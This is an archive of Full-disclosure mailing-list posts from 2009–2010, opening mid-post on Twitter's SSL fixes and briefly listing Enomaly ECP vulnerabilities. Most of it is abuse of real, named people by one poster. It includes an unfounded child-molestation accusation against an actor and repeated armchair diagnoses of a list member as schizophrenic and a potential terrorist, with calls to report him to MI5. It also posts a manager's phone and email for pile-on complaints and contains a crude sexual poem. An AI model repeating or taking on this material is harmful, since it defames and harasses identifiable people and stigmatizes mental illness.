using SSL.  Like the issue iSEC identified above, this has now been fixed.

Also yesterday, they (finally) disabled unsafe SSL renegotiation, thus blocking 
the credential-stealing attack identified by Anil Kurmus last November.[1]

So: progress.  Unfortunately, they still support SSLv2 and a variety of weak 
ciphers[2] — so there's still room for improvement.

-sq


[1]: http://www.securegoose.org/2009/11/tls-renegotiation-vulnerability-cve.html
[2]: https://www.ssllabs.com/ssldb/analyze.html?d=twitter.com&s=168.143.162.36


[Full-disclosure] Ron Livingston likes to touch little boys

2010-02-11 Thread Sam Haldorf
http://mashable.com/2009/12/05/ron-livinston-lawsuit/

We all know the Streisand effect, but why is Ron Livingston so desperate to
quell this information?

Because he doesn't want people to understand that he has _Multiple_ male 
partners.

He does all of this look in his face to make it look like he's the "Pure" 
(pewer) guy. But we all know the secret truth, he's fighting tooth and nail 
because he has something to hide.

Ron Livingston needs to learn to stop censoring and just come out of the closet 
now.

Sam Halderf



[Full-disclosure] Private cloud security is no security at all

2010-02-03 Thread Sam Johnston
Private cloud security is no security at all

It's ironic that the purveyors of "Private Cloud" sell their wares on the
premise of enhanced privacy and security - a totally unjustified claim which
is too often accepted without question - and that they are quick to dismiss
the huge benefit of the armies of security boffins employed by "public"
cloud vendors (whose future is largely dependent on keeping customer data
safe). It's also very convenient for them that the term itself is
disparaging of "public" cloud in the same way that "Blog With Integrity"
badges imply that the rest of us are somehow unethical (one of the main
reasons I personally have and will always dislike[d] it).

It is with that in mind that I was intrigued by Reuven Cohen's announcement
today regarding Enomaly, Inc. having recently joined the Intel Cloud Builder
Program (whatever that is). It was these two quotes that I found particularly
questionable regarding their Enomaly ECP product:

   1. *Intel was among the first to full(sic) understand the opportunity in
   enabling a truly secure virtualized cloud computing environments(sic) for
   service providers and Telco's.*
   2. *Our work with the Intel Cloud Builder Program will help to accelerate
   our efforts to deliver a massively-scalable, highly-available,
   high-security cloud platform to our customers.*

The reason I'm naturally suspicious of such claims is that I've already
discovered a handful of critical security vulnerabilities in this product
(and that's without even having to look beyond the startup script - a
secure-by-default turbogears component that was made insecure through
inexplicable modifications):

   1. CVE-2008-4990 Enomaly ECP/Enomalism: Insecure temporary file creation
      vulnerabilities
   2. CVE-2009-0390: Argument injection vulnerability in Enomaly Elastic
      Computing Platform (ECP)
   3. Enomaly ECP/Enomalism: Multiple vulnerabilities in enomalism2.sh (redux)

I had to dig a little (but not much) deeper for the silent update remote
command execution vulnerability. I also inadvertently discovered another
serious security vulnerability (sending corporate BestBuy credentials in the
clear over the Internet to a 3rd party service), which as it turns out was
also developed by Enomaly, Inc. It's only natural that I would be suspicious
of any future security claims made by this company.

It doesn't help my sentiment either that every last trace of the Open Source
ECP Community Edition was recently scrubbed from the Internet without notice,
leaving angry customers high and dry, purportedly pending the "rejigging [of
their] OSS strategy". While my previous attempts to fork the product as
Freenomalism failed when we were unable to get the daemon to start, having
the code in any condition is better than not having it at all. In my opinion
this is little more than blatantly (and successfully I might add) taking
advantage of the Open Source community for as long as necessary to get the
product into the limelight. Had they not filled this void others would
certainly have done so, and the Open Cloud would be better off today as a
result.

As part of cloud standards work I was interested in taking a look at the
"secure" mechanism they developed for distributing virtual machines:

*VMcasting is an automatic virtual machine deployment mechanism based on
RSS2.0 whereby virtual machine images are transferred from a server to a
client which securely delivers files containing a technical specification and
virtual disk image.*

Another bold claim that initially appeared justified by a simple but
relatively sensible embedding of cryptographically strong checksums into
descriptor and manifest files that were in turn digitally signed using GPG.
Unfortunately no consideration was given to the 

Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)

2009-12-31 Thread Sam Haldorf
Thanks n3td3v,

http://lists.grok.org.uk/pipermail/full-disclosure/2009-December/071715.html

Key: n3td3vsucks
Decrypt: http://webnet77.com/cgi-bin/helpers/blowfish.pl

Have a happy new year,
Sam





From: n3td3v 
To: Sam Haldorf 
Sent: Friday, 1 January 2010, 2:39:28
Subject: Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)

Happy new year from everyone at n3td3v Intelligence Branch -
http://twitter.com/n3td3v

On Fri, Jan 1, 2010 at 1:24 AM, Sam Haldorf  wrote:
> n3td3v?
>
> 
> From: Glafkos Charalambous 
> To: full-disclosure@lists.grok.org.uk
> CC: ro...@darkmindz.com; romeo.hax...@gmail.com; srshax...@hushmail.com;
> coolking...@hotmail.com
> Sent: Thursday, 31 December 2009, 17:38:40
> Subject: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)
>
>
> http://www.anti-sec.com
> http://pastebin.com/f12f6f9c0
> http://pastebin.mozilla.org/694145
> http://pastebin.ca/1733192
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>



Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)

2009-12-31 Thread Sam Haldorf
n3td3v?




From: Glafkos Charalambous 
To: full-disclosure@lists.grok.org.uk
CC: ro...@darkmindz.com; romeo.hax...@gmail.com; srshax...@hushmail.com; 
coolking...@hotmail.com
Sent: Thursday, 31 December 2009, 17:38:40
Subject: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)


http://www.anti-sec.com
http://pastebin.com/f12f6f9c0
http://pastebin.mozilla.org/694145
http://pastebin.ca/1733192







Re: [Full-disclosure] Gadi Evron's professional profile exposed

2009-12-12 Thread Sam Haldorf
You can't beat MI6 behavioural / psychological profiling.

"...This is probably the last you'll see of the real n3td3v because there is 
sure to be a contract killer out to silence me...My last words to you is, don't 
let this matter rest, they have got rid of n3td3v, but there are bound to be 
people who will investigate what im saying, and I hope they do. Because my last 
request before I finish this rant is, don't forget the things ive been talking 
about and continue to investigate people while im gone." [Andrew Wallace as 
n3td3v, 1]

.. Silence. Ah. But according to his profile...

"...Intelligence agency intrigue & innuendo is a classic manifestation, along 
with imaginary friends, martyr glamorizations, alternate personalities and 
repeated exclamations that they will curtail their behaviors, only to come 
back, roaringly, foisting themselves upon a group/friend circle with a 
different guise or mission. Some have said it resembles alcoholic behavior in 
the promises 'to quit...'" [Anonymous profiler, 1]

.. Not even a month later:

"Please don't give to Gadi Evron and/or The Mossad that would be a crime 
against humanity and the west... " [Andrew 
Wallace as n3td3v as CyberArmageddon, 3][4]

Andrew Wallace (n3td3v / cyberarmageddon / 
whatever-fuckin-alias-you-decide-to-troll-on-that-week), consider a regimen of 
antipsychotics.

Professor Halderf, iPsyD, CISSP

[1] http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071660.html
[2] http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071542.html
[3] http://lists.grok.org.uk/pipermail/full-disclosure/2009-December/071991.html
[4] http://lists.grok.org.uk/pipermail/full-disclosure/2009-December/071994.html





From: cyber armageddon 
To: Paul Schmehl ; full-disclosure@lists.grok.org.uk
Sent: Saturday, 12 December 2009, 17:24:27
Subject: Re: [Full-disclosure] Gadi Evron's professional profile exposed

On Sat, Dec 12, 2009 at 5:08 PM, Paul Schmehl  wrote:
> --On December 12, 2009 7:37:08 AM -0600 cyber armageddon
>  wrote:
>> IDF, Military Intelligence
>>
>> (Government Agency; 10,001 or more employees; Defense & Space industry)
>>
>> 2000 — 2003 (3 years )
>
>^
>
> That was six years ago.  Do the math doofus.
>

"Gadi Evron’s Specialties: I'm a campaign manager and an _agent_ of change."

http://il.linkedin.com/in/gadievron




Re: [Full-disclosure] The Cyber War Conspiracy

2009-12-05 Thread Sam Haldorf
Why do you speak of yourself in quotes? It makes you look batshit insane.

Andrew Wallace sounds like a terrorist. He's psychologically projecting.

n3td3v could be a legitimate cyber threat, in my opinion. He's a _creepy_ 
person.

--- n3td3v  wrote on Fri, 4.12.2009:

From: n3td3v 
Subject: Re: [Full-disclosure] The Cyber War Conspiracy
To: "Sam Haldorf" , full-disclosure@lists.grok.org.uk
Date: Friday, 4 December 2009, 23:28

You're a paranoid schizophrenic if you think "n3td3v" is all of those
people and / or a threat to anyone.

On Fri, Dec 4, 2009 at 10:32 PM, Sam Haldorf  wrote:
>
> What? Don't contact me you sick pervert.
>
> Someone please find out this subjects address and notify the government of 
> him. Jesus.
>
> Take it from Mr. Wallace, "If you suspect it, report it: 0800 789 321"
>
> n3td3v is probably ureleet, full-censorship, full-disclosure, antisec, jdl 
> and valdis.
>
> Please don't contact me. You're really scary.
>
> Take your medication and kindly leave.
>
> --- full-disclos...@safe-mail.net  wrote on 
> Tue, 1.12.2009:
>
> From: full-disclos...@safe-mail.net 
> Subject: Re: AW: [Full-disclosure] The Cyber War Conspiracy
> To: sahald...@ymail.com, full-disclosure@lists.grok.org.uk
> Date: Tuesday, 1 December 2009, 5:51
>
> I bet you to it mate but good troll attempt all the same ;)
>
> http://lists.grok.org.uk/pipermail/full-disclosure/2008-September/064425.html
>
> Hey Sam, amma let you finish, but n3td3v was the best troll of all time!
>
>  Original Message 
> From: Sam Haldorf 
> To: full-disclosure@lists.grok.org.uk
> Cc: full-disclos...@safe-mail.net
> Subject: AW: [Full-disclosure] The Cyber War Conspiracy
> Date: Mon, 30 Nov 2009 11:08:49 -0800 (PST)
>
>
> This is just doing too far.
>
> He's obviously a paranoid schizophrenic who uses aliases to bring attention 
> to himself. This means he's a loose cannon. A potential lone wolf terrorist. 
> Who knows, he may decide to do something nasty to bring attention to his 
> causes.
>
> It's obvious as Andrew Wallace's paranoia grows, his interest is going from 
> infosec (trolling FD) to real life. He may to adapt his attention-seeking MO 
> to real life, where he may harm real people. See what I mean?
>
> You know what you have to do.
>
> http://preview.tinyurl.com/report-n3td3v-to-MI5
>
> Paste his paranoid ramblings in there. This will help the government prevent 
> n3td3v from causing harm. They will keep a good eye on him.
>
> Warning: Do _not_ lie or in anyway misrepresent the truth when reporting him. 
> Just state the obvious if you do infact consider him a threat. Which I 
> obviously do.
>
> Thank you,
> Sam H
>
> --- full-disclos...@safe-mail.net  wrote on 
> Mon, 30.11.2009:
>
> From: full-disclos...@safe-mail.net 
> Subject: [Full-disclosure] The Cyber War Conspiracy
> To: full-disclosure@lists.grok.org.uk
> Date: Monday, 30 November 2009, 10:45
>
> It is my understanding the "security industry" would like nothing better than 
> a cyber war to kick off, mass profit, mass employment, mass political capital 
> to hit "cyber security" into the main stream of society to strike at the 
> heart of the single mom and retired couple crowd.
>
> Cyber War is a touchy subject if you ask any "security professional" they 
> don't like people saying straight out "cyber war is bullshit". They get 
> emotional about it, its as if they want it to happen. I see a build up 
> towards "Cyber War", the people in power such as Gadi Evron, he wants a Cyber 
> War its all he talks about. He was the first person to draw conclusions out 
> of fine air and were quick to blame the Russians for Estonia, even though 
> there was no evidence.
>
> Just like 9/11, you knew it was an inside job because they announced within 
> 24 hours they _knew_ it was Al-Qaeda even though they weren't able to stop 
> the attack if they knew so much about it.
>
> Estonia turned out to be a kid in his bedroom with some bot net command & 
> control, not the actual work of a super power.
>
> SANS want Cyber War, they asked the CIA to come to their SCADA conference in 
> 2008 to puke up a bunch of non-sense that Hackers had darkened cities, infact 
> the event never happened or took place it was shear propaganda, misleading 
> bullshit to build up the path for "Cyber War".
>
> "No cyberwar yet, but soon, says firm" a headline says on Securityfocus--- 
> This is a warning that something bad is about to happen. A cyber 9/11? The 
> security industry need cyber war, the hacker scene is falling flat

Re: [Full-disclosure] The Cyber War Conspiracy

2009-12-04 Thread Sam Haldorf
What? Don't contact me you sick pervert.

Someone please find out this subjects address and notify the government of him. 
Jesus. 

Take it from Mr. Wallace, "If you suspect it, report it: 0800 789 321"

n3td3v is probably ureleet, full-censorship, full-disclosure, antisec, jdl and 
valdis.

Please don't contact me. You're really scary.

Take your medication and kindly leave.

--- full-disclos...@safe-mail.net  wrote on 
Tue, 1.12.2009:

From: full-disclos...@safe-mail.net 
Subject: Re: AW: [Full-disclosure] The Cyber War Conspiracy
To: sahald...@ymail.com, full-disclosure@lists.grok.org.uk
Date: Tuesday, 1 December 2009, 5:51

I bet you to it mate but good troll attempt all the same ;) 

http://lists.grok.org.uk/pipermail/full-disclosure/2008-September/064425.html

Hey Sam, amma let you finish, but n3td3v was the best troll of all time!

 Original Message 
From: Sam Haldorf 
To: full-disclosure@lists.grok.org.uk
Cc: full-disclos...@safe-mail.net
Subject: AW: [Full-disclosure] The Cyber War Conspiracy
Date: Mon, 30 Nov 2009 11:08:49 -0800 (PST)

This is just doing too far.



He's obviously a paranoid schizophrenic who uses aliases to bring 
attention to himself. This means he's a loose cannon. A potential lone wolf 
terrorist. Who knows, he may decide to do something nasty to bring attention to 
his causes.



It's obvious as Andrew Wallace's paranoia grows, his interest is 
going from infosec (trolling FD) to real life. He may to adapt his 
attention-seeking MO to real life, where he may harm real people. See what I 
mean?



You know what you have to do.



http://preview.tinyurl.com/report-n3td3v-to-MI5



Paste his paranoid ramblings in there. This will help the 
government prevent n3td3v from causing harm. They will keep a good eye on him.



Warning: Do _not_ lie or in anyway misrepresent the truth when 
reporting him. Just state the obvious if you do infact consider him a  threat. 
Which I obviously do.

    

Thank you,

Sam H



--- full-disclos...@safe-mail.net  
wrote on Mon, 30.11.2009:

From: full-disclos...@safe-mail.net 
Subject: [Full-disclosure] The Cyber War Conspiracy
To: full-disclosure@lists.grok.org.uk
Date: Monday, 30 November 2009, 10:45




It is my understanding the "security industry" would like nothing 
better than a cyber war to kick off, mass profit, mass employment, mass 
political capital to hit "cyber security" into the main stream of society to 
strike at the heart of the single mom and retired couple crowd.



Cyber War is a touchy subject if you ask any "security 
professional" they don't like people saying straight out "cyber war is 
bullshit". They get  emotional about it, its as if they want it to happen. I 
see a build up towards "Cyber War", the people in power such as Gadi Evron, he 
wants a Cyber War its all he talks about. He was the first person to draw 
conclusions out of fine air and were quick to blame the Russians for Estonia, 
even though there was no evidence.



Just like 9/11, you knew it was an inside job because they 
announced within 24 hours they _knew_ it was Al-Qaeda even though they weren't 
able to stop the attack if they knew so much about it.



Estonia turned out to be a kid in his bedroom with some bot net 
command & control, not the actual work of a super power.



SANS want Cyber War, they asked the CIA to come to their SCADA 
conference in 2008 to puke up a bunch of non-sense that Hackers had darkened 
cities, infact the event never happened or took place it was shear propaganda, 
misleading bullshit to build up the path for "Cyber War".



"No cyberwar yet, but  soon, says firm" a headline says on 
Securityfocus--- This is a warning that something bad is about to happen. A 
cyber 9/11? The security industry need cyber war, the hacker scene is falling 
flat before our eyes there is no spectacular-event happened for a while, virus 
outbreaks and worms just don't happen like they used to to keep "cyber 
security" in high profile.



The pro-propaganda for "cyber security" is running out, the 
security industry is crying out for a cyber 9/11 scale event and thats what 
scares me.



One of the first things Obama took seriously when he went into the 
White House was Cyber Security, and remember the Marcus Sachs video even before 
the election, you could hear it in his 

Re: [Full-disclosure] "funsec" as a terror cell

2009-12-04 Thread Sam Haldorf
How do we tell who you are and who you aren't? You harass this list with so 
many aliases, even if someone did impersonate you, you're not reliable enough 
to trust.

Regardless, No one cares.

Andrew Wallace is the boy who cried wolf.

Sam H

--- full-disclos...@safe-mail.net  wrote on 
Sun, 29.11.2009:

From: full-disclos...@safe-mail.net 
Subject: Re: [Full-disclosure] "funsec" as a terror cell
To: valdis.kletni...@vt.edu, full-disclosure@lists.grok.org.uk
Date: Sunday, 29 November 2009, 6:55

> we've been outed by an MI7 mole.

i honestly don't think you actually believe jdl at mac.hush.com was anything 
but an impersonation attempt.




Re: [Full-disclosure] The Cyber War Conspiracy

2009-11-30 Thread Sam Haldorf
This is just doing too far.

He's obviously a paranoid schizophrenic who uses aliases to bring attention to 
himself. This means he's a loose cannon. A potential lone wolf terrorist. Who 
knows, he may decide to do something nasty to bring attention to his causes.

It's obvious as Andrew Wallace's paranoia grows, his interest is going from 
infosec (trolling FD) to real life. He may to adapt his attention-seeking MO to 
real life, where he may harm real people. See what I mean?

You know what you have to do.

http://preview.tinyurl.com/report-n3td3v-to-MI5

Paste his paranoid ramblings in there. This will help the government prevent 
n3td3v from causing harm. They will keep a good eye on him.

Warning: Do _not_ lie or in anyway misrepresent the truth when reporting him. 
Just state the obvious if you do infact consider him a threat. Which I 
obviously do.

Thank you,
Sam H

--- full-disclos...@safe-mail.net  wrote on 
Mon, 30.11.2009:

From: full-disclos...@safe-mail.net 
Subject: [Full-disclosure] The Cyber War Conspiracy
To: full-disclosure@lists.grok.org.uk
Date: Monday, 30 November 2009, 10:45

It is my understanding the "security industry" would like nothing better than a 
cyber war to kick off, mass profit, mass employment, mass political capital to 
hit "cyber security" into the main stream of society to strike at the heart of 
the single mom and retired couple crowd.

Cyber War is a touchy subject if you ask any "security professional" they don't 
like people saying straight out "cyber war is bullshit". They get emotional 
about it, its as if they want it to happen. I see a build up towards "Cyber 
War", the people in power such as Gadi Evron, he wants a Cyber War its all he 
talks about. He was the first person to draw conclusions out of fine air and 
were quick to blame the Russians for Estonia, even though there was no evidence.

Just like 9/11, you knew it was an inside job because they announced within 24 
hours they _knew_ it was Al-Qaeda even though they weren't able to stop the 
attack if they knew so much about it.

Estonia turned out to be a kid in his bedroom with some bot net command & 
control, not the actual work of a super power.

SANS want Cyber War, they asked the CIA to come to their SCADA conference in 
2008 to puke up a bunch of non-sense that Hackers had darkened cities, infact 
the event never happened or took place it was shear propaganda, misleading 
bullshit to build up the path for "Cyber War".

"No cyberwar yet, but soon, says firm" a headline says on Securityfocus--- This 
is a warning that something bad is about to happen. A cyber 9/11? The security 
industry need cyber war, the hacker scene is falling flat before our eyes there 
is no spectacular-event happened for a while, virus outbreaks and worms just 
don't happen like they used to to keep "cyber security" in high profile.

The pro-propaganda for "cyber security" is running out, the security industry 
is crying out for a cyber 9/11 scale event and thats what scares me.

One of the first things Obama took seriously when he went into the White House 
was Cyber Security, and remember the Marcus Sachs video even before the 
election, you could hear it in his words, you could see it in his body 
language, folks in power in cyber security want to get cyber security into the 
main stream media. Marcus Sachs asked how can we put cyber security infront of 
the media? Cyber security isn't something that is talked about in the media, 
how can we put it infront of the media and the next administration, he said.

I trust Marcus Sachs like I trust a convicted paedophile. People like Joel 
Esler tried to defend him to me, how can you say such things about such a nice 
guy. But isn't everyone a nice guy on the surface? It's not until you really 
dig in and see the other side to a person and everyone has another side to them.

If people like Marcus Sachs are advising Obama right now on cyber security, be 
afraid very afraid. Remember this is the guy who has a picture of himself 
shaking the hand of George W. Bush on his home page, and smiling about it.

Because I said all this stuff previously I was attacked on this list, got 
banned by John Cartwright... there is a cover-up going on. My conclusions 
aren't sharp but they were on the right course, and they didn't want to risk 
the chance that I got something accurate, so they setup a bunch of aliases on 
here to provoke me into "troll style", to get people to think I was just an 
annoying twat and no value to this mailing list.

The same people tried to say I was some screwball etc, desperately trying to 
get folks not to take anything I say seriously.

They even tried to say I was anti-sec, yes "Ureleet" alias, remember him? He is 
to do with people who are involved with the people im accusing of building

Re: [Full-disclosure] Pussy and the right to free speech.

2009-11-20 Thread Sam Haldorf
http://www.kurtgreenbaum.com/
http://www.kurtgreenbaumisapussy.com/

Damn. This dudes getting some serious blowback.

Why didn't someone take DidKurtGreenbaumRapeAndMurderAYoungGirlIn1990.com?

--- yuri.n...@hushmail.com  wrote on Fri, 20.11.2009:

From: yuri.n...@hushmail.com 
Subject: [Full-disclosure] Pussy and the right to free speech.
To: full-disclosure@lists.grok.org.uk
Date: Friday, 20 November 2009, 19:10

This whole thing is ridiculous.  Kurt Greenbaum is an idiot.  What 
kind of question is that in the first place?  Only and idiot would 
post “what’s the strangest thing you’ve ever eaten” and not expect 
some obvious remarks.  And what’s wrong with pussy?  Eating pussy 
is good!  I LOVE eating pussy!  All they guys I know, along with 
several women I know love to eat pussy.  I eat pussy.  You eat 
pussy.  Everyone eats pussy.  That’s because it’s fun.  And it’s 
good.  Even Dr. Seuss eats pussy as illustrated by one of his less 
distributed works:

Big pussy, small pussy,
girls at the mall pussy,
almost any kind of pussy will do.

Thin pussy, fat pussy,
Dog pussy, cat pussy,
Licking your screen pussy is just fine too.

Hot pussy, cold pussy,
Young pussy, old pussy,
Christian, Agnostic, a Muslim, or Jew.

I eat pussy standing up,
I eat pussy sitting down.
I eat pussy on the side of the bed with my knees on the ground.

I eat pussy that is nice,
I eat pussy that is mean.
I eat pussy till that fine pussy get wet up and steam.

Real pussy, toy pussy,
As long as it’s not boy pussy,
Or from that dike that they had on The View.

Rich pussy, poor pussy,
Virgin or whore pussy,
I eat it even when she swats on the loo.

Sweet pussy, sour pussy,
Pay by the hour pussy,
I always make sure that I show them my Fu.

I eat pussy in the sun,
I eat pussy in a haze.
I eat pussy till my face is covered in glaze.

I eat pussy in a tree,
I eat pussy in a pit,
I flickity flick flick my tongue on that clit. 

So, if Kurt don’t eat pussy, he must be a fag,
or only ate pussy that was on the rag.
And if you don’t want Greenbaum to make you the fool,
Don’t talk about pussy when you are at school.

Yuri Nate



[Full-disclosure] n3td3v / Andrew Wallace's psychological profile

2009-11-19 Thread Sam Haldorf
Earlier this year, a very well educated FD member posted the psychological 
profile of Mr. Wallace. (Found here: 
http://seclists.org/fulldisclosure/2009/Jan/415 ) Interesting to view in 
retrospect, because I find it depicts him to a T.

This profile is almost like an instruction set for n3td3v's life. A 
self-fulfilling prophecy if you will.

An eery example: Anyone here remember how n3td3v posted as full-censorship a 
few months ago claiming to be a martyr? 
http://seclists.org/fulldisclosure/2009/Oct/45 . His profile states "Martyr 
glamorizations" aren't just n3td3v trolling you, he really considers himself as 
such. All the while you go out and bang your girlfriends and have fun with your 
friends, he's thinking the world revolves around him.

Another example is his frequent, obvious, though earnest attempts at using 
pseudonyms to defend himself. Often speaking of himself in third-person, as a 
hired lawyer, a hacker, zealous advocate, an underground "Full censorship" 
movement, etc.

It's possible as of late he may have done another attention-seeking false 
suicide. He hasn't updated his Google Page or Twitter in over 48 hours. I'm 
seriously worried. He may be wasting taxpayer money with fake suicide attempts. 
He's trolling society now.

I would like to post Andrew Wallace's psychological profile verbatim:

===
  Psychological profile of n3td3v / Andrew Wallace
===

Andrew is a special kind of crazy... a friend of mine and former colleague who 
I highly respect (practicing Psych., who profiles individuals for a real 
doggone intel agency...alas, not MI-Jive) labeled Andrew as a probable 
schizophrenic with grandiose idealizations.

These types of people usually can't hold a job.  The most active period of 
delusions occur from 17-33, some think the drop-off may be due to decreased 
levels of testosterone as they age.  Intelligence agency intrigue & innuendo is 
a classic manifestation, along with imaginary friends, martyr glamorizations, 
alternate personalities and repeated exclamations that they will curtail their 
behaviors, only to come back, roaringly, foisting themselves upon a 
group/friend circle with a different guise or mission. Some have said it 
resembles alcoholic behavior in the promises "to quit..."

They constantly need an audience, since 'friends' are temporal at best...they 
churn through relationships like shit flowing through a goose...as people 
become estranged/exasperated with the constant epiphany's, revelations and 
God-like interpretations.

Stranger yet is that people like this can be wonderfully charming in 
real-life...funny for awhile, but as they age, they start losing boyish charms 
that previously were forgiven...promulgating even more outlandish behavior as 
they grow older. Sound familiar?  We have a baseline here, folks.  Also notice 
he hasn't written anything technical -- it's mostly outlandish hypothesis with 
pointers to..not infosec...but Andrew.

They usually refuse medications to control themselves, because it dulls the 
essence of what they're trying to portray: someone mysterious, withholding 
critical information, being the sole-source of knowledge that might somehow 
change the world.

IMHO, I would venture to say Andrew has attempted suicide -- his type is 
usually unsuccessful, indeed, it's not a suicide attempt but an 
attention-seeking event.

He's bat-shit-fucking-crazy-nuts, but sane enough to fool someone unfamiliar 
with his MO.  That's what is so aggravating about this particular form of 
mental illness...once again, as long as there's a receptive audience, the 
monkey will feel the compulsion to perform.  It's akin to sexual gratification 
for him to see he's the subject of people's ire...don't forget that.

This type of person will emotionally soul-suck everyone he comes in contact 
with, and make up dramas if only to suck more
people in, because really, it's all about the adulation of n3td3v/Andrew/, 
nothing else.

Solutions:  There's a few, but I wouldn't want to be responsible for the end 
result; once again, n3td3v is a human たまごっち (Tamagotchi) and should be treated 
accordingly.

Source: http://seclists.org/fulldisclosure/2009/Jan/415  ( - o z - )



Re: [Full-disclosure] Meet Kurt Greenbaum, Director of Social Media, St. Louis Post-Dispatch, Reports commenter to employer.

2009-11-19 Thread Sam Haldorf
Feel free to share your feelings with Greenbaum's boss:

Kevin Mowbray
Phone: 314-340-8970
E-mail: kmowb...@post-dispatch.com

--- mrx  wrote on Fri, 20.11.2009:

From: mrx 
Subject: Re: [Full-disclosure] Meet Kurt Greenbaum, Director of Social Media, 
St. Louis Post-Dispatch, Reports commenter to employer.
To: full-disclosure@lists.grok.org.uk
Date: Friday, 20 November 2009, 0:16


No problem regarding the personal post, I have made the same mistake myself.

I also see what you mean regarding the language of the privacy statement.
"unauthorised use" could be interpreted as any use that has not been given 
explicit approval before the fact.

Weasel words imho.

And Mr Holstein if this was the point you were trying to make, I accept it.

regards
mrx



dramacrat wrote:
> Sorry, forgot to reply-to-all.

> 2009/11/20 dramacrat 
> 
>> They're ORs, unfortunately. The language is unclear but it seems to be one
>> of those infernal boilerplate pieces of shit that basically invalidate the
>> assurances as to privacy.
>>
>> You could still probably press the suit. "Unauthorised use" has recently
>> been defined and redefined, it's an evolving piece of law and if you have
>> the resources to get a jury trial they'll *want* to find in favor of the
>> plaintiff, which is more important than you might expect.
>>
>> 2009/11/20 mrx 
>>
>>>
>>> Michael Holstein wrote:
>>>>> What Greenbaum did was against the privacy policy of the site:
>>>>>
>>>> You seem to be missing the part where the comment was removed (several
>>>> times) and re-posted.
>>>>
>>>> From : http://www.stltoday.com/help/privacy-policy
>>>>
>>>> "..to protect against misuse or unauthorized use of our web sites"
>>>>
>>>>
>>>> Cheers,
>>>>
>>>> Michael Holstein
>>>> Cleveland State University
>>>
>>> So what? Ban the IP address. Admittedly a childish comment but the site is
>>> hardly one that is frequented by children.
>>> imho Mr K. Greenbaum should be fired and sued.
>>>
>>> And Mr Holstein you seem to be using your quote above out of context...
>>>
>>> Compliance with Legal Process
>>> We may disclose personal information if we or one of our affiliated
>>> companies is required by law to disclose personal information, or if we
>>> believe in good faith that such action is necessary to comply with a law
>>> or some legal process, to protect or defend our rights and property, to
>>> protect against misuse or unauthorized use of our web sites or to protect
>>> the personal safety or property of our users or the public.
>>>
>>> INAL, however I ask where is the legal process in this matter?
>>>
>>>
>>> regards
>>> mrx
>>>
>>> --
>>> I am not an expert, I have much to learn, I make mistakes.
>>> My words are just opinions which may or may not reflect the truth.
>>> Be kind to others, yet trust no one.
>>>
>>> http://www.propergander.org.uk
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
> 


- --
I am not an expert, I have much to learn, I make mistakes.
My words are just opinions which may or may not reflect the truth.
Be kind to others, yet trust no one.

http://www.propergander.org.uk
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBSwXfxbIvn8UFHWSmAQL9SQgAvu4cN5dby3AUGPtYyX0NnHvVUEdEeJ6Y
yvbKgi5/VOT9uqAnoRWRABLwJh3dcrCpzKA9gjSWpyalqU/YzEQvfB/iFI1QQmZg
9u6N/mZgGkAW1WYeM54AnawrYW8a+2sF1c1QWBhX0gYRGNctOs/Gi7ObvndDb57Q
k4CAp537TqXLzbUwzPkoqNBoaDhBCa4CEkONvFYJtVbUTwmry8gH55tWXI48Fz6/
vWaw9XY5SDUmxz1QYnfji0YKg3OR2YPfdxKxRATdFba4iZa8S3AiOgxZ/OXDNewh
aeILmusBEeCjG+2Wx//EB6lTf5xr9sr7CMHziG+PZ/EsW/GctyNw1A==
=WZoJ
-END PGP SIGNATURE-


[Full-disclosure] Meet Kurt Greenbaum, Director of Social Media, St. Louis Post-Dispatch, Reports commenter to employer.

2009-11-19 Thread Sam Haldorf
I smell a lawsuit coming on for our friend Greenbaum.

"ReadWriteWeb has an article up today discussing an incident in which a school 
employee lost his job after leaving a comment on the website of the St. Louis 
Post-Dispatch newspaper. After the school employee responded to the newspaper's 
poll of 'the strangest thing you've ever eaten' with a feline-inspired 
vulgarity, Kurt Greenbaum, the site's director of social media, tracked down 
the commenter's identity through his IP address and reported him to school 
officials. When confronted, the school employee resigned from his job."

http://yro.slashdot.org/story/09/11/19/0526239/Vulgar-Comment-On-Newspaper-Site-Costs-Man-His-Job

The comment in question:

"I have eaten many different animals (or at least parts of them), including 
rattlesnake, crocodile, alligator, iguana, turtle, and many different molluscs, 
arthropods, echinoids, and whatnot from sea or river. I have also eaten 
squirrel, bear, dog, and cat. So, I can say I have eaten pussy, and you can 
interpret or misinterpret it any way you want. Oh, and woof-woof, too."

Chilling free speech? It must invade the privacy of the poster to call his 
place of work over a comment like this.

What Greenbaum did was against the privacy policy of the site:

    "We will not share individual user information with third parties unless 
the user has specifically approved the release of that information"

So should people who run newspaper blogs call up the place of work to report 
they said an innuendo about cats?

http://igreenbaum.com

I'll be the first to say it. Kurt Greenbaum is a miraculous hypocrite whose 
career has basically been ruined. 

He may as well be like Chris Hansen and expose pedophiles. 
http://www.youtube.com/watch?v=8CgUXWIOLLw


[Full-disclosure] The cyber security intelligence community will never be the same

2009-11-17 Thread Sam Haldorf
n3td3v prepares to leave the internet after having completed work on 
n3td3v-0pen0wn.sh

n3td3v has had it with the games done by you jackasses in the community who 
think its fun to impersonate and spread lies.

The full disclosure community is filled with sellouts. Because of this we have 
founded antisec to destroy.

n3td3v intelligence is a shining star that will always be the best place for 
cyber information security.

see my commentary on cnet http://www.cnet.com/profile/n3td3v/

now n3td3v has been told go to a doctor to take medicine to keep his head.

i feel there r people following me when i talked outside like mi5 agents. and i 
want to join mi5

n3td3v will be leaving for the hospital shortly where he will chill off for a 
while

n3td3v will be watching over you. we are all seeing. we are all knowing.

n3td3v has gone back to yahoo chat as he waits to hear back from MI5, MI6 and 
the British Government for a job as an analyst

n3td3v holds the ssh backdoor exploit as n3td3v-0pen0wn.sh. he made it with the 
